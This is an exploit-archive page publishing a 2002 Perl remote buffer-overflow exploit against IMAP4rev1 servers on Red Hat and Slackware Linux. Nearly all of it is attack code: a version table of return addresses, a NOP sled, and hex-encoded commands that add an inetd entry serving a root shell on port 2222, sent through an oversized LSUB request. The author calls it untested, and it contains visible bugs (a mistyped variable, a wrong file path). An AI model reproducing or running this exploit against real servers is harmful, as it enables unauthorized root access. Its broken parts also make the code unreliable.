IMAP4rev1 remote exploit

Свойства

Дата публикации:
27.08.2002

Код

IMAP4rev1 remote exploit для RedHat и Slackware Linux.

#!/usr/bin/perl
# Once upon a flame came a blue bird...
# i grabbed my rifle and shot the shot the son of a bitch
# the cops came, i ran like hell...
# i fucked my transmission
# ocifer i swear the drunk i'm not god
#
# blah blah blah blahb blah blah blah.... yeha yeah yeah eyah
#
# Imapd Remote sploit... muagahaahah... yeha i know it's gay :)
# Note: This is not tested but should work... i got bored what can i say :)
#
# [ElectronicSouls] - www.electronicsouls.org
# -BuRn-X(burnx@electronicsouls.zzn.com)

use IO::Socket;

if (!$ARGV[3]) {
print "I'm god i tell yah!!!! i'm god dammit!!!!!\n";
print "Feed Me: ./imapdog.pl [[-Hostname-]] [[-Username-]] [[-Password-]] [[-Type-]] [[-Offset-]]\n\n";
print "Type     System              Version    \n";
print "1       Red Hat 5.1      IMAP4rev1 v10.223\n";
print "2       Red Hat 5.2      IMAP4rev1 v11.241\n";
print "3       Red Hat 6.0      IMAP4rev1 v12.250\n";
print "4       Red Hat 6.1      IMAP4rev1 v12.250\n";
print "5       Red Hat 6.2      IMAP4rev1 v12.264\n";
print "6       Slackware 4.0    IMAP4rev1 v12.250\n";
print "7       Slackware 7.0    IMAP4rev1 v2000.284\n";
print "8       Slackware 7.0    IMAP4rev1 v12.261\n";
print "9       Slackware 7.1    IMAP4rev1 v12.264\n";
exit;
}

$my = $ARGV[0];
$dog = $ARGV[1];
$is = $ARGV[2];
$really = $ARGV[3];
$horny = $ARGV[4];

if ( $really eq "1" ) {
$retaddr = "0xbffff31c";
}
if ( $really eq "2" ) {
$retaddr = "0xbffff320";
}
if ( $really eq "3" ) {
$retaddr = "0xbffff2f0";
}
if ( $realy eq "4" ) {
$retaddr = "0xbffff2c4";
}
if ( $really eq "5" ) {
$retaddr = "0xbffff2c8";
}
if ( $really eq "6" ) {
$retaddr = "0xbffff890";
}
if ( $really eq "7" ) {
$retaddr = "0xbfffebc8";
}
if ( $really eq "8" ) {
$retaddr = "0xbffff3ec";
}
if ( $really eq "9" ) {
$retaddr = "0xbffff4e0";
}

$ret = (hex $retaddr) + $horny;
$swoosh = pack("l", $ret);

$girls = "\x90" x 613;

# Niacikatrix Shellcode
$unfcode = "\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72".
             "\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74".
             "\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20".
             "\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f".
             "\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e".
             "\x65\x74\x64\x20\x2f\x74\x6d\x2f\x70\x68";
$fluffy .= $girls;
$fluffy .= $unfcode;
$fluffy .= $swoosh x 96;

$badboy = IO::Socket::INET->new( PeerAddr => "$my", Proto => "tcp", PeerPort => "143");

print $badboy "1 LOGIN $dog $is\r\n";
print $badboy "1 LSUB \"\" {1064}\n";
print $badboy "$fluffy\r\n";


или введите имя

CAPTCHA